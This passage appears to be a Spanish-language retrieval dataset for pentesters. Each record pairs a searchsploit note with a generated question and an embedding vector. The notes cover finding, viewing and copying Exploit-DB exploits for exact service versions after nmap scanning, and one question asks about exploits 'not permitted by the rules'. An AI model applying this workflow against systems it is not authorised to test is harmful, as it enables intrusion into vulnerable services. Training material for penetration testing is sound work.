0.01449, 0.07503, 0.03891, 0.03084, 0.0223, 0.03246, -0.03897, -0.08773, -0.0534, -0.04085, -0.01542, 0.12343, 0.00255, 0.09304, -0.10823, -0.01471, 0.03246, -0.06124, -0.05075, 0.04595, -0.1021, 0.01087, -0.02989, 0.05711, 0.05045, 0.15863, 0.00315, -0.0307, 0.1012, -0.01674, 0.04135, 0.08023, -0.06991, -0.06688, 0.03932, 0.07016, 0.02227, -0.04471, -0.04496, -0.0493, -0.01681, -0.09625, 0.00116, -0.09686, -0.08634, 0.01338, 0.05896, 0.02544, -0.01772, -0.00814, 0.02736, -0.09197, 0.1439, -0.00713, -0.05491, -0.01892, -0.05192, -0.05897, -0.02338, 0.02962, -0.04375, 0.0136, -0.15819, 0.00377, -0.1001, 0.05988, 0.04291, -0.03374, -0.08687, 0.00699, -0.01865, 0.00177, -0.11937, -0.0286, 0.00081, 0.00845, -0.08153, -0.00224, 0.06086, -0.0292, 0.08446, 0.00731, 0.02125, -0.03833, 0.03929, -0.06476, -0.05378, -0.04612, 0.00826, -0.02506, 0.0192, -0.04208, -0.03965, 0.03991, 0.04653, -0.03521, 0.02166, 0.05941, 0.02773, -0.04123, -0.05462, -0.00895, 0.0078, 0.114, -0.08226, -0.01336, 0.05799, -0.05705, -0.0893, -0.05772, 0.02536, -0.00397, -0.0056, -0.01797, 0.0355, 0.05407, 0.06818, 0.08846, -0.03043, 0.02667, -0.07569, -0.03041, 0.06651, 0.04404, -0.00916, -0.05498, -0.00351, -0.05695, 0.01719, 0.03137, 0.0989, 0.0082, -0.02626, -0.047, 0.03889, 0.05933, -0.02451, 0.04824, -0.0689, -0.04545, -0.04037, 0.08397, -0.01202, -0.00805, 0.01918, 0.01639, 0.01405, 0.03793, 0.01337, 0.02355, 0.00331, 0.06882, 0.0344, 0.03858, 0.01474, 0.0004, 0.04038, -0.05018, -0.06222, 0.00778, -0.0284, 0.04959, -0.0629, -0.08018, -0.03751, 0.0388, 0.07648, 0.04922, -0.01257, -0.0434, -0.05089, -0.02816, -0.00186, -0.0414, -0.07975, -0.00693, 0.00848, 0.07102, -0.05442, 0.02698, -0.03938]} +{"tipo": "pregunta", "herramienta": "searchsploit", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## El workflow OSCP\n```\nNmap -sV β†’ identificas servicio + VERSIΓ“N β†’ searchsploit β†’ explotas\n```\nSustituye a los escΓ‘neres de vulns prohibidos (Reglas de herramientas).", "indexar": "ΒΏQuΓ© herramienta me sirve para verificar la versiΓ³n de un servicio en red?", "v": [-0.11808, 0.12453, -0.17488, -0.14533, 0.07392, -0.12324, -0.09147, -0.11167, 0.12309, -0.174, -0.12713, -0.20058, -0.01105, -0.14681, 0.15099, 0.05238, 0.01105, -0.11845, 0.08352, 0.05474, 0.06446, -0.06976, -0.07981, -0.0514, -0.09642, 0.14533, 0.08024, -0.11307, -0.12652, 0.00367, 0.03088, -0.05206, -0.0264, -0.04138, -0.13801, 0.0227, 0.05203, 0.03355, 0.02424, 0.07144, -0.02313, 0.00922, 0.04206, 0.03914, 0.02867, -0.01852, 0.01167, 0.00823, -0.04164, 0.13878, -0.03296, -0.09434, -0.12932, 0.02877, -0.10975, -0.08993, 0.04589, -0.10333, -0.02265, -0.07441, -0.06263, -0.08117, -0.06314, -0.01508, 0.00721, -0.06445, -0.05181, -0.02875, -0.0199, 0.05392, -0.08011, 0.067, 0.04738, -0.01436, -0.15955, -0.02055, -0.00389, -0.05324, 0.05254, -0.00743, 0.12834, 0.09969, -0.06235, 0.00453, -0.02287, -0.0769, 0.04222, -0.08007, 0.00766, -0.07299, 3e-05, 0.11383, 0.01998, 0.05926, 0.0142, 0.01109, 0.06097, -0.06234, 0.00217, 0.00536, 0.15798, -0.05732, -0.03868, 0.02235, -0.07351, -0.01655, -0.0003, -0.03633, -0.0843, -0.01919, 0.09106, -0.03665, -0.06695, 0.03433, 0.02371, 0.02836, -0.0265, -0.05748, -0.02113, -0.02726, -0.01053, 0.04336, -0.04968, -0.05508, 0.0274, -0.02424, -0.06456, 0.07605, 0.00086, -0.03414, -0.00771, -0.05941, -0.07952, -0.0368, -0.02688, -0.02507, 0.0485, -0.13138, 0.01034, -0.04306, 0.0269, 0.04132, -0.03532, -0.08731, 0.0471, 0.06791, 0.02697, -0.04163, -0.03248, 0.04317, -0.01479, -0.08248, -0.04853, 0.07384, -0.02333, 0.01366, 0.00603, -0.01524, -0.10364, 0.07793, 0.00328, -0.08807, 0.06413, -0.01632, -0.02237, -0.02473, 0.05967, 0.02948, 0.10618, -0.00165, 0.00444, -0.02015, -0.0011, -0.05935, -0.01351, -0.05365, -0.10243, -0.02077, 0.00122, -0.07451, -0.01726, -0.01594, -0.05035, -0.00689, 0.00263, -0.05615, 0.02521, -0.04058, -0.01679, -0.02913, 0.02514, -0.00446, 0.02726, -0.04977, 0.07446, 0.03272, 0.0174, -0.03844, -0.00845, -0.03549, -0.09958, -0.03431, -0.06121, -0.04543, 0.03289, 0.07953, 0.02958, 0.03853, -0.00632, 0.05068, -0.01824, 0.04478, 0.0765, -0.0292, -0.03495, -0.05163, 0.04778, 0.01093, 0.00669, -0.02647, 0.01876, -0.04322, -0.00923, 0.01636, -0.01358, 0.02106, 0.05046, -0.03027, -0.00781, 0.02916, 0.0493, 0.00098, -0.01381, -0.0175, 0.00208, -0.07294, 0.07549, 0.02526, -0.04235, -0.09248, 0.01884, 0.05719, -0.0039, -0.0183, -0.00602, -0.00943, -0.01599, -0.02891, -0.03809, -0.0473, -0.01583, 0.00203, 0.04106, -0.06595, 0.03034, -0.01277]} +{"tipo": "pregunta", "herramienta": "searchsploit", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## El workflow OSCP\n```\nNmap -sV β†’ identificas servicio + VERSIΓ“N β†’ searchsploit β†’ explotas\n```\nSustituye a los escΓ‘neres de vulns prohibidos (Reglas de herramientas).", "indexar": "ΒΏCΓ³mo puedo encontrar exploits para vulnerabilidades especΓ­ficas que no estΓ‘n permitidas por las reglas?", "v": [0.14035, 0.20967, -0.00538, -0.00461, 0.06051, 0.03333, -0.02744, -0.04758, -0.0678, -0.10363, 0.02923, -0.03096, 0.00965, -0.02704, -0.00289, -0.03873, -0.07177, -0.07726, 0.05384, -0.07359, -0.0169, -0.16704, -0.07868, 0.00501, -0.06181, -0.01186, 0.12822, 0.02434, -0.1113, -0.12163, -0.13619, -0.01684, 0.09067, -0.04598, -0.06481, 0.14521, 0.01284, 0.02957, 0.09135, 0.0481, 0.08373, -0.007, -0.09344, -0.07203, 0.21156, -0.03643, -0.18345, -0.07673, -0.10241, -0.01439, 0.0379, -0.02653, -0.18013, -0.12179, 0.0014, -0.03259, 0.06365, -0.02501, -0.07742, 0.03268, -0.1152, -0.02503, 0.0943, 0.08104, -0.02061, -0.03147, 0.0564, 0.04774, -0.04592, 0.17864, 0.0421, -0.02792, 0.01452, -0.00024, 0.01237, -0.01735, -0.04935, -0.05371, -0.03813, 0.05001, 0.01796, 0.05502, -0.03562, -0.00147, -0.07452, 0.00179, 0.05138, -0.00811, 0.04227, -0.10542, 0.10979, 0.00883, 0.01633, -0.06145, 0.03685, -0.16149, -0.06731, 0.10251, -0.00136, 0.06645, -0.05942, -0.09436, -0.04066, 0.11268, -0.03459, 0.00504, 0.01606, -0.02591, 0.01286, -0.08904, -0.00825, 0.04905, -0.06168, -0.00675, 0.07294, 0.09214, -0.03331, -0.02373, 0.04184, -0.05557, -0.11154, -0.10882, -0.03219, 0.13373, 0.10173, 0.00315, -0.01137, 0.10104, -0.04273, -0.09225, -0.02835, -0.0027, 0.03076, 0.05441, 0.00976, 0.02945, 0.0152, 0.02447, -0.11649, -0.02329, 0.06105, -0.021, -0.03103, 0.01065, -0.01101, 0.00951, -0.03346, -0.06054, -0.0948, -0.03014, 0.01725, 0.03074, -0.04231, 0.08063, -0.02705, 0.07063, -0.01534, -0.07319, 0.00959, 0.07953, 0.05787, 0.11086, -0.01074, -0.00868, 0.04973, 0.0498, 0.03696, 0.01338, -0.01161, -0.01359, -0.00682, 0.05579, 0.01676, -0.0044, 0.06717, -0.06432, -0.04529, -0.03948, -0.01766, -0.02569, 0.00836, 0.01422, -0.01687, -0.01957, 0.02025, 0.02128, 0.08844, -0.01945, 0.06867, 0.04496, 0.02655, -0.04211, 0.02797, -0.0057, -0.02021, -0.01749, 0.0093, 0.05292, -0.04783, -0.0915, -0.02414, 0.06552, -0.0412, -0.01753, 0.10472, -0.02239, 0.01448, -0.02277, -0.04847, 0.0189, -0.01212, 0.02897, 0.01089, -0.0597, -0.10849, 0.01455, -0.03223, 0.06029, -0.04153, -0.11188, -0.00707, 0.0393, 0.05673, 0.00066, 0.0109, -0.00865, -0.03573, -0.04359, -0.00528, 0.08233, 0.03167, -0.01513, -0.05353, 0.01726, 0.01083, -0.03861, -0.00715, 0.03563, -0.01764, 0.03534, 0.05155, 0.01229, 0.05451, -0.03996, 0.00109, -0.02736, -0.01907, 0.0157, -0.0557, -0.05443, 0.02861, -0.06876, 0.04372, -0.07391, 0.01402, -0.03226]} +{"tipo": "pregunta", "herramienta": "searchsploit", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Buscar\n```bash\nsearchsploit apache 2.4.49 # servicio + versiΓ³n EXACTA\nsearchsploit -t wordpress # -t = solo en el tΓ­tulo (menos ruido)\nsearchsploit \"vsftpd 2.3.4\"\nsearchsploit --nmap scan.xml # Β‘toma un nmap -oX y busca por ti!\n```\n- Quita la versiΓ³n si no sale nada (a veces el exploit es genΓ©rico).\n- Usa tΓ©rminos cortos: `searchsploit drupal` mejor que la cadena entera.", "indexar": "que herramienta me sirve para buscar exploits de una versiΓ³n exacta de un servicio?", "v": [0.05288, 0.07401, -0.27341, -0.15208, 0.02495, -0.12593, -0.12621, -0.03315, 0.07005, -0.07034, -0.08734, -0.14849, 0.00134, -0.01011, 0.05294, -0.07125, 0.09946, -0.11808, 0.02357, 0.05914, 0.01315, 0.06313, -0.06221, -0.04966, -0.13862, 0.04828, 0.06299, -0.10024, -0.16947, 0.06005, -0.01574, 0.03942, -0.03354, -0.09113, -0.05762, -0.06085, -0.0093, -0.03211, 0.02475, 0.04305, 0.00976, -0.04785, -0.10371, 0.03704, 0.0391, -0.00587, -0.01986, 0.05529, -0.048, 0.12252, -0.01576, -0.1781, -0.20527, 0.02331, -0.05056, -0.09892, 0.1326, -0.11668, -0.04477, -0.0595, -0.11906, -0.08369, -0.04862, -0.02502, 0.06131, -0.07059, -0.00588, -0.05694, -0.08839, 0.08271, -0.08679, 0.0426, 0.08253, -0.01229, -0.09391, -0.05229, 0.03249, -0.00031, -0.02553, 0.02883, 0.05959, -0.02893, -0.14366, 0.00848, -0.09299, -0.06872, 0.12671, 0.01017, 0.02122, -0.09199, -0.00545, 0.09692, -0.08558, 0.03279, 0.00014, -0.02979, 0.13791, -0.07532, 0.02607, 0.02805, 0.12709, -0.09623, -0.07854, 0.06565, -0.05279, -0.01622, 0.01686, -0.01733, -0.11036, -0.01293, 0.0696, -0.02402, 0.03059, 0.04644, 0.00095, 0.04125, -0.05952, -0.06881, -0.01688, -0.04392, -0.02764, -0.005, -0.03758, -0.01789, 0.043, -0.01085, -0.06809, 0.04425, 0.05084, -0.10819, -0.00879, -0.01249, -0.04978, 0.02264, 0.00362, -0.04591, 0.10956, -0.11293, 0.01642, -0.05996, 0.05062, 0.04351, -0.01692, -0.08862, 0.02695, 0.03924, 0.0612, -0.02271, 0.01807, -0.04322, -0.0343, -0.07029, -0.03406, 0.05605, -0.05188, -0.02768, -0.03574, -0.01931, -0.0872, 0.08113, 0.0069, -0.05471, 0.05942, -0.03058, -0.03206, -0.04078, 0.03788, 0.00278, 0.05437, 0.00355, -0.0215, -0.00574, 0.05661, -0.05461, 0.01656, -0.0487, -0.07797, 0.01047, 0.01406, -0.02614, -0.02827, -0.04596, -0.02469, -0.00862, -0.02084, -0.05315, 0.03681, -0.04572, -0.03827, -0.06202, 0.06166, 0.00704, 0.02669, -0.00306, 0.01511, 0.01774, -0.00052, 0.01471, 0.01692, -0.09506, -0.10283, -0.02889, -0.04972, -0.0206, 0.01203, 0.05191, 0.02898, -0.00124, -0.04747, 0.02615, 0.00857, 0.03642, 0.03294, -0.05444, -0.0306, -0.0476, 0.0577, 0.00914, 0.00501, -0.00737, -0.00756, -0.01865, 0.00788, 0.02302, -0.03589, 0.02206, 0.03111, -0.04714, -0.03662, -0.03108, 0.04064, 0.00162, -0.02105, -0.02905, 0.01625, -0.09209, 0.05237, -0.00595, -0.05923, -0.08734, -0.02875, 0.05987, 0.01869, -0.00116, -0.03382, -0.0504, -0.00134, -0.02812, -0.0325, -0.05686, -0.01419, -0.00853, 0.04465, -0.05772, 0.05646, -0.03201]} +{"tipo": "pregunta", "herramienta": "searchsploit", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Buscar\n```bash\nsearchsploit apache 2.4.49 # servicio + versiΓ³n EXACTA\nsearchsploit -t wordpress # -t = solo en el tΓ­tulo (menos ruido)\nsearchsploit \"vsftpd 2.3.4\"\nsearchsploit --nmap scan.xml # Β‘toma un nmap -oX y busca por ti!\n```\n- Quita la versiΓ³n si no sale nada (a veces el exploit es genΓ©rico).\n- Usa tΓ©rminos cortos: `searchsploit drupal` mejor que la cadena entera.", "indexar": "con que puedo encontrar vulnerabilidades sin especificar la versiΓ³n del programa?", "v": [0.10724, 0.1164, -0.12333, -0.13219, 0.10089, -0.04393, 0.02992, -0.12778, -0.07812, -0.09588, 0.04912, -0.11769, -0.08913, -0.07376, 0.02389, 0.09951, 0.03793, -0.17535, 0.02839, 0.07644, 0.02146, -0.09629, -0.04782, -0.05792, -0.09745, 0.10898, -0.06534, -0.01203, 0.03692, -0.10015, -0.01128, -0.0026, 0.03117, -0.06511, -0.04882, 0.14724, -0.00235, -0.02426, 0.02619, 0.00033, 0.11331, 0.00556, 0.0234, 0.04989, 0.05249, -0.12356, 0.03344, 0.02291, 0.00452, -0.02619, -0.0496, 0.0387, -0.14126, 0.0291, 0.0624, -0.10747, 0.10359, -0.07514, 0.03468, 0.049, -0.01453, 0.06298, 0.0754, -0.05554, 0.07236, 0.00773, 0.00434, 0.06114, -0.10396, 0.04015, 0.01846, -0.00263, 0.02628, -0.05019, -0.04769, 0.0223, -0.11483, -0.05071, 0.01206, -0.00798, 0.00238, 0.01687, 0.07562, 0.07792, -0.15472, -0.06082, 0.07042, 0.00777, 0.0431, -0.11867, 0.11383, 0.04068, -0.05628, 0.02675, 0.02723, -0.10839, 0.19012, 0.04124, -0.03186, 0.04172, -0.00725, -0.0547, -0.0609, 0.09463, -0.04315, 0.06672, 0.11098, -0.00698, -0.03652, -0.01142, 0.0122, -0.05738, -0.04374, -0.06415, -0.02573, 0.03393, -0.02877, -0.00507, 0.09728, -0.06499, -0.10113, -0.02833, -0.05148, 0.00532, 0.08561, 0.0006, -0.0473, 0.10543, -0.0559, 0.02591, -0.0076, 0.01959, 0.01723, -0.00814, -0.09032, 0.06624, 0.04541, -0.00597, -0.01625, -0.01798, 0.03563, -0.00165, 0.11351, 0.04973, 0.02304, 0.03646, 0.02151, -0.08155, -0.0344, 0.05011, 0.00885, 0.05589, -0.00821, 0.09045, -0.04571, -0.01945, -0.01878, -0.01964, -0.03766, 0.08523, 0.01745, 0.08963, -0.12085, -0.1006, 0.08238, 0.01736, 0.01252, 0.02011, 0.10491, 0.03605, -0.02711, 0.06485, 0.11297, -0.0309, -0.02331, -0.07033, 0.03733, -0.08232, 0.02165, -0.02195, -0.07451, 0.01051, -0.01764, -0.06254, -0.03229, -0.05077, 0.00108, 0.04363, 0.0065, -0.01489, -0.04313, 0.00586, -0.00056, 0.02208, -0.01087, -0.04937, 0.02279, 0.01216, -0.02273, -0.04524, -0.12152, -0.02016, -0.04675, -0.03459, 0.09972, 0.15053, -0.01382, -0.00249, 0.01469, 0.10485, -0.01078, -0.02442, 0.04257, -0.03061, -0.00855, -0.05697, 0.01923, 0.05989, 0.06161, 0.02951, -0.03977, -0.01144, 0.05638, 0.04859, 0.03869, -0.10796, 0.01074, -0.00154, 0.0065, 0.06438, -0.00016, -0.00929, -0.0297, -0.0807, 0.0465, 0.00335, -0.00046, 0.01335, -0.05059, -0.07163, -0.0196, 0.05777, 0.03312, -0.10976, -0.03537, -0.0155, -0.04319, 0.00829, 0.00819, -0.01198, -0.04375, 0.09278, 0.05156, -0.12879, 0.02408, -0.01701]} +{"tipo": "pregunta", "herramienta": "searchsploit", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Buscar\n```bash\nsearchsploit apache 2.4.49 # servicio + versiΓ³n EXACTA\nsearchsploit -t wordpress # -t = solo en el tΓ­tulo (menos ruido)\nsearchsploit \"vsftpd 2.3.4\"\nsearchsploit --nmap scan.xml # Β‘toma un nmap -oX y busca por ti!\n```\n- Quita la versiΓ³n si no sale nada (a veces el exploit es genΓ©rico).\n- Usa tΓ©rminos cortos: `searchsploit drupal` mejor que la cadena entera.", "indexar": "cual es una alternativa a searchsploit para analizar archivos de escaneo nmap?", "v": [-0.10677, -0.0832, -0.06476, -0.09265, -0.05944, -0.10104, -0.02465, -0.11214, -0.28614, 0.07125, -0.00871, -0.11975, -0.00797, -0.02111, 0.02422, -0.05097, -0.00297, -0.06491, 0.15435, 0.15744, -0.11081, 0.01971, -0.15761, 0.00101, -0.07919, 0.01218, -0.16204, 0.18274, -0.00392, 0.07043, -0.13059, 0.0721, 0.00965, -0.03773, -0.05354, 0.11606, 0.16367, -0.06681, 0.00896, 0.03439, -0.11188, -0.00874, -0.15113, 0.00961, -0.07168, -0.12211, -0.1219, -0.02112, -0.07091, -0.04295, -0.07064, 0.0573, -0.09636, 0.08592, 0.06093, -0.05524, 0.05957, -0.08027, 0.0592, -0.04339, -0.12088, 0.08722, -0.0094, -0.07987, -0.06714, 0.02213, 0.02061, 0.02835, -0.08714, 0.01182, -0.08275, 0.0162, 0.01988, -0.01173, -0.083, 0.03265, 0.07738, -0.02734, 0.07492, 0.03991, 0.09303, -0.06317, -0.08861, 0.05887, -0.14992, -0.0793, 0.00972, 0.0168, -0.00028, 0.06403, -0.00409, -0.04021, -0.02659, 0.06132, -0.01209, -0.05078, 0.10029, -0.06539, -0.01898, 0.06861, 0.02078, 0.01172, -0.12665, 0.09898, 0.01877, 0.07182, -0.04319, 0.09676, -0.08073, 0.02735, 0.07037, 0.08426, -0.01324, 0.01966, 0.02087, -0.05373, -0.00463, -0.05838, -0.04426, -0.06229, -0.04048, 0.03579, -0.03052, -0.03849, -0.00643, -0.00165, 0.0862, -0.07058, 0.03785, 0.06665, 0.0785, 0.02253, -0.10422, 0.0004, -0.11783, -0.02704, 0.10366, -0.02196, -0.00433, 0.0323, 0.03073, -0.00645, -0.00826, -0.02189, 0.0638, 0.0348, 0.01558, 0.01526, -0.00337, -0.09908, -0.04501, -0.05015, -0.04489, 0.02901, -0.06235, 0.01232, -0.07375, -0.03486, -0.04233, 0.07212, 0.03372, -0.02864, 0.00453, 0.05323, 0.00705, -0.05816, 0.04014, -0.05727, -0.06597, -0.08277, 0.01347, 0.03179, -0.03752, -0.06315, 0.02147, 0.02808, 0.02771, -0.09618, 0.02071, -0.00505, -0.02473, -0.00642, -0.03021, 0.04362, -0.00202, -0.04119, 0.05647, 0.01262, -0.04643, 0.00912, 0.06091, 0.00159, -0.04596, -0.02775, -0.05043, 0.03348, 0.00689, -0.07082, 0.00048, -0.01888, -0.0446, -0.00885, -0.05208, -0.00893, -0.03558, -0.03369, -0.06514, -0.01891, 0.03019, -0.01638, -0.01746, 0.00292, 0.04979, -0.00237, -0.02917, -0.04232, -0.02274, 0.0275, -0.00153, 0.00861, -0.00632, 0.04443, 0.04443, -0.00409, -0.08304, 0.03395, 0.00094, -0.03818, -0.01685, -0.03497, -0.02094, 0.00416, -0.00525, 0.04658, -0.00161, -5e-05, 0.01885, 0.00915, 0.00864, -0.00892, 0.07385, 0.03703, -0.04452, 0.04746, -0.0426, -0.04227, -0.02812, 0.02127, -0.00221, -0.00431, 0.01482, 0.01193, -0.03556, 0.00986, 0.09851, -0.00111]} +{"tipo": "pregunta", "herramienta": "searchsploit", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Examinar y copiar\n```bash\nsearchsploit -x 50383 # ver el exploit (path por EDB-ID)\nsearchsploit -m 50383 # MIRROR: lo copia a tu carpeta actual\nsearchsploit -p 50383 # solo imprime la ruta\nsearchsploit -u # actualizar la base\n```", "indexar": "que programa sirve para examinar y copiar exploits?", "v": [0.18213, 0.02614, -0.16495, -0.13622, 0.1521, -0.21271, 0.0641, 0.0639, -0.04944, -0.12314, 0.05313, -0.0496, -0.00308, 0.02277, -0.06503, -0.07055, 0.10478, -0.08182, 0.0488, 0.08647, 0.06416, 0.12263, 0.03039, -0.07392, -0.06043, 0.1286, -0.05606, -0.03333, -0.00502, 0.00929, -0.03483, 0.08869, 0.12561, -0.1246, -0.01556, -0.02367, 0.04505, -0.10905, 0.0187, 0.06406, 0.11745, -0.00428, -0.12806, 0.00264, 0.03418, -0.00063, -0.01376, 0.04507, 2e-05, 0.05238, 0.05505, -0.02622, -0.08785, -0.05321, -0.00369, -0.06784, 0.01421, -0.08667, -0.05032, 0.06312, 0.03167, -0.04831, 0.02236, -0.05146, 0.08115, -0.08195, 0.07292, -0.01528, -0.10993, 0.09717, -0.09, 0.11322, 0.09992, 0.00821, -0.10061, -0.08778, -0.03247, -0.09941, 0.01994, 0.05498, -0.05011, -0.06395, -0.02195, 0.02366, -0.06751, -0.04441, 0.05079, 0.04062, -0.01287, -0.04567, -0.0241, 0.0557, 0.03839, 0.01158, 0.0098, -0.09816, 0.16352, 0.02677, 0.07061, 0.07361, 0.0663, -0.13986, -0.07696, 0.08297, -0.10963, 0.09071, 0.04635, -0.05543, -0.08672, -0.02124, 0.01366, 0.00296, -0.09318, -0.02866, -0.09057, -0.02225, -0.05182, -0.03902, 0.00843, -0.06205, -0.09792, 0.01398, -0.08556, 0.03055, 0.07919, -0.00805, 0.01644, 0.08832, -0.03512, -0.02559, -0.00259, 0.06528, 0.01216, 0.07241, -0.01928, -0.15846, 0.00297, -0.08353, -0.02252, -0.09172, 0.02369, 0.12287, -0.00696, -0.01268, -0.0212, 0.03442, 0.06766, -0.04615, 0.00207, -0.03654, -0.04994, -0.02865, -0.08171, 0.06177, -0.06789, -0.02538, 0.04456, -0.04118, -0.0148, 0.13453, -0.05141, -0.00801, 0.00565, -0.07453, 0.04941, -0.02616, 0.01332, -0.02519, 0.09276, 0.07414, 0.00399, 0.06002, 0.0242, -0.09002, 0.03237, -0.03703, 0.01838, 0.00537, 0.02685, -0.005, -0.10697, 0.05579, 0.06813, 0.07561, -0.00775, -0.02062, 0.0199, 0.06378, -0.01633, -0.0409, 0.06228, -0.02016, 0.05632, 0.00737, -0.00441, 0.00835, -0.03447, 0.04687, 0.0615, -0.05258, -0.03547, -0.02582, -0.05682, -0.02295, 0.07919, 0.04819, 0.00498, 0.01177, 0.00534, 0.07724, -0.07113, 0.01871, 0.03018, -0.02523, -0.04538, -0.0518, 0.00652, 0.07864, 0.02012, -0.01686, -0.01722, 0.00533, 0.03675, 0.04188, -0.03628, -0.02192, 0.01852, -0.00191, 0.0023, 0.02941, 0.00033, 0.00713, 0.00798, -0.01556, -0.00423, -0.05998, -0.0169, 0.01003, -0.00071, -0.09998, -0.0661, 0.06876, 0.0135, -0.04849, -0.02158, 0.01533, -0.01979, -0.00191, 0.02364, -0.03065, -0.00938, 0.01722, 0.02052, -0.02631, 0.06902, 0.02065]} +{"tipo": "pregunta", "herramienta": "searchsploit", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Examinar y copiar\n```bash\nsearchsploit -x 50383 # ver el exploit (path por EDB-ID)\nsearchsploit -m 50383 # MIRROR: lo copia a tu carpeta actual\nsearchsploit -p 50383 # solo imprime la ruta\nsearchsploit -u # actualizar la base\n```", "indexar": "con que puedo ver el exploit de una vulnerabilidad especΓ­fica?", "v": [0.07361, 0.10641, -0.21296, -0.00637, 0.0296, 0.10239, -0.01124, -0.03644, -0.01932, -0.07345, 0.05534, -0.04049, -0.04747, 0.06852, -0.06775, 0.05395, -0.02033, -0.09935, -0.01359, -0.00201, 0.01756, -0.08788, 0.04175, -0.01157, -0.04699, 0.12174, -0.03553, 0.02898, 0.00514, -0.15487, -0.0978, 0.05426, 0.00797, -0.05082, 0.04008, 0.09304, -0.0284, 0.0242, 0.08306, 0.04121, 0.13222, -0.04589, -0.10184, 0.02528, 0.13966, -0.0579, -0.13393, -0.03998, -0.0043, 0.0893, -0.05597, 0.01257, -0.22452, -0.09041, 0.03449, -0.0249, 0.09488, -0.03686, 0.01267, 0.07711, -0.04884, 0.07341, 0.05328, 0.00421, 0.0709, -0.08696, -0.03934, 0.06447, -0.14893, 0.08584, 0.00648, 0.02966, -0.0345, 0.02818, 0.01194, 0.02401, -0.02742, 0.0193, -0.02448, -0.0164, -0.00873, 0.02546, 0.0088, 0.04783, -0.15525, -0.07542, 0.12054, 0.004, 0.07369, -0.12249, 0.11998, 0.00943, -0.10925, -0.05957, -3e-05, -0.07018, 0.08384, 0.03568, -0.05466, 0.01385, -0.02632, -0.0673, -0.03251, 0.10078, 0.06491, 0.05312, 0.01276, -0.05437, 0.02492, -0.10481, 0.00899, -0.07434, -0.05315, -0.08184, -0.02489, 0.02547, -0.085, -0.01814, 0.07547, -0.00888, -0.11359, -0.15414, 0.02214, 0.01472, 0.03367, -0.01572, -0.10353, 0.08496, 0.01203, -0.03925, -0.09434, 0.04618, -0.013, 0.05191, -0.0319, -0.00078, 0.03103, -0.07189, -0.01888, 0.02431, 0.09009, 0.0326, 0.06769, 0.00788, 0.0214, 0.04597, -0.01208, -0.02524, -0.10458, 0.01389, -0.00889, -0.00281, 0.0094, 0.05723, -0.08065, 0.01907, 0.02749, -0.05457, 0.04408, 0.11183, -0.02436, 0.04825, -0.04254, 0.04819, 0.01143, -0.00618, 0.02389, -0.03376, 0.11856, 0.04465, -0.0627, 0.05089, 0.05515, 0.05004, 0.04617, -0.09344, -0.04282, -0.01229, 0.01441, -0.09835, -0.06822, -0.03598, -0.0374, -0.03054, -0.04215, -0.01879, 0.02821, -0.03176, 0.07204, 0.04812, 0.02231, 0.00296, -0.00334, 0.10136, -0.01022, -0.04271, -0.06687, 0.04318, -0.01737, -0.05484, -0.04073, 0.02322, -0.00246, -0.02882, 0.0979, 0.04472, -0.01616, -0.01008, -0.08297, 0.07805, 0.05623, -0.02516, 0.10352, -0.07865, -0.06505, 0.00449, 0.05124, 0.03971, 0.02378, 0.00759, 0.00486, 0.05216, 0.0776, 0.0009, 0.01609, -0.02679, -0.01285, -0.02238, 0.01282, 0.0714, -0.0215, 0.03369, -0.07495, -0.05061, 0.0926, 2e-05, 0.00742, -0.0461, -0.0617, -0.0492, 0.00378, 0.06297, 0.01234, -0.06779, 0.01695, -0.05743, -0.08008, 0.04021, -0.02182, -0.1061, -0.02914, 0.05864, 0.05909, -0.10473, 0.02818, -0.05481]} +{"tipo": "pregunta", "herramienta": "searchsploit", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Examinar y copiar\n```bash\nsearchsploit -x 50383 # ver el exploit (path por EDB-ID)\nsearchsploit -m 50383 # MIRROR: lo copia a tu carpeta actual\nsearchsploit -p 50383 # solo imprime la ruta\nsearchsploit -u # actualizar la base\n```", "indexar": "cual es una alternativa libre a searchsploit para actualizar y buscar exploits?", "v": [-0.05697, 0.0978, -0.25743, -0.0924, 0.04895, -0.10703, -0.0362, -0.03953, -0.13832, -0.05585, -0.04027, -0.17704, -0.08889, 0.08242, 0.02523, -0.20285, 0.02773, -0.0803, 0.03482, 0.00137, -0.0623, 0.05435, -0.06919, -0.08507, -0.09982, -0.01298, -0.07615, -0.03248, -0.08424, 0.01265, -0.02983, 0.04442, -0.02993, 0.08349, -0.0445, 0.0716, 0.16321, -0.03367, 0.01193, -0.08232, 0.04688, -0.08025, -0.15468, 0.07349, 0.01528, -0.09909, -0.06428, -0.01733, -0.01028, -0.04217, -0.05315, 0.00657, -0.11174, 0.00959, 0.05749, -0.06306, 0.15416, -0.10476, -0.05748, -0.08276, -0.11581, -0.01663, 0.00342, -0.0373, 0.0289, -0.02168, 0.03331, 0.07979, -0.12207, 0.13863, -0.00013, -0.02137, 0.03501, 0.0576, -0.13816, 0.03481, 0.04576, -0.08115, 0.04224, 0.08591, -0.01892, -0.0979, -0.04948, 0.10741, -0.12776, -0.13271, 0.08488, -0.03159, -0.0458, -0.02117, 0.08767, -0.02628, -0.06855, 0.04351, -0.01511, -0.05325, 0.12582, -0.08036, -0.01081, 0.12252, -0.06653, -0.03701, -0.06498, 0.06557, -0.03618, -0.017, -0.00835, 0.06875, -0.04383, -0.0189, 0.01257, -0.00293, 0.03394, 0.0, 0.03355, 0.00371, -0.08211, -0.10157, 0.00498, -0.04608, -0.11665, -0.05332, -0.07764, -0.04837, 0.06352, 0.01201, 0.03472, -0.00971, 0.02443, -0.05095, 0.06266, 